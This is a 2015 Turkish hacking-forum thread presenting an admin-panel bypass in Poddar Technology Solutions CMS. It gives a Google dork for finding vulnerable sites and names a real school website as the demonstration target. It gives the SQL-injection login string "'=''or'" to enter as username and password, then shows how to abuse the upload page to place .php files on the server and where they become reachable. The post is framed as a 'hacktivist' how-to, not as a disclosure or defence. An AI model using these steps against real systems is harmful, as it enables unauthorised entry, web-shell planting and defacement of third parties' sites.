Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Poddar Technology Solutions CMS Admin Bypass Açığı
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,369 / 1,369
Deneyim: 78 / 100
Rep Sayısı: 2742
Mesaj Sayısı: 6282
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Poddar Technology Solutions CMS Admin Bypass Açığı
02.07.2015 15:56
Google Aratma Kodumuz =>
Kod:
intext:Powered By Poddar Technology Solutions

Anlatım => KingSkrupellos - Cyberizm Digital Security Army

Orjinal Satıcı Sitesi =>
Kod:
http://www.ptsworld.in/

Not => Tüm Versiyonlarda Açık Mevcuttur.

Kod:
HEDEFSITE/admin_login.php

Örnek Site Üzerinde Gösterelim =>

Kod:
http://www.rihsedu.co.in/admin_login.php

Yönetici Paneli Giriş Yerimiz =>



Kullanıcı adı ve Şifreyi aynı şekilde giriyoruz Smile

Kod:
'=''or'

Kod:
'=''or'

Peki Yönetim Panelinden Neler Yapabiliyoruz bir bakalım Smile

Kod:
HEDEFSITE/admin/select_session.php

Oturumları değiştirebiliyoruz Smile



Karşımıza ilk gelen bölüm ( örnek site üzerinden )

Kod:
HEDEFSITE/admin/doc_upload.php



Sözde siteye Microsoft Word dosyası yani .docx uzantılı dosya yükleyebiliyoruz amma velakin biz .php .html . txt .jpg .xml ne varsa yüklüyoruz.

Yüklenince şöyle bir yazı çıkarsa Dosya Başarılı bir şekilde sisteme yüklenmiş demektir.

Kod:
Thank for submisson file ( Dosyanızın İsmi.php ) Gibi

Dosyanın Gittiği Bölüm =>
Kod:
/admin/file_dir.php



View ( Görüntüle ) Delete ( Sil ) uygulayabiliyoruz

Sağ tuş yaparak veya direk üstüne tıklayarak dosyamızın nereye gittiğini görebiliriz. Yukarıdaki resimdeki gibi Smile

Dosyamızın Gittiği Bölüm

Kod:
HEDEFSITE/upload/Dosyanızın İsmi.php
(Bu konu en son: 02.07.2015 Tarihinde, Saat: 16:00 düzenlenmiştir. Düzenleyen: KingSkrupellos.)
Alinti
Rep Verenler: DEFALGE , WhoCares
DEFALGE
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 17
Yaşam Puanı: 93 / 406
Deneyim: 27 / 100
Rep Sayısı: 66
Mesaj Sayısı: 342
Üyelik Tarihi: 13.10.2014
     
Yorum: #2
Cvp: Poddar Technology Solutions CMS Admin Bypass Açığı
02.07.2015 16:01
Eline sağlık Smile

Kendi sitelerinde bile aynı açık var abi Exciting
(Bu konu en son: 02.07.2015 Tarihinde, Saat: 16:45 düzenlenmiştir. Düzenleyen: DEFALGE.)
Alinti



1 Ziyaretçi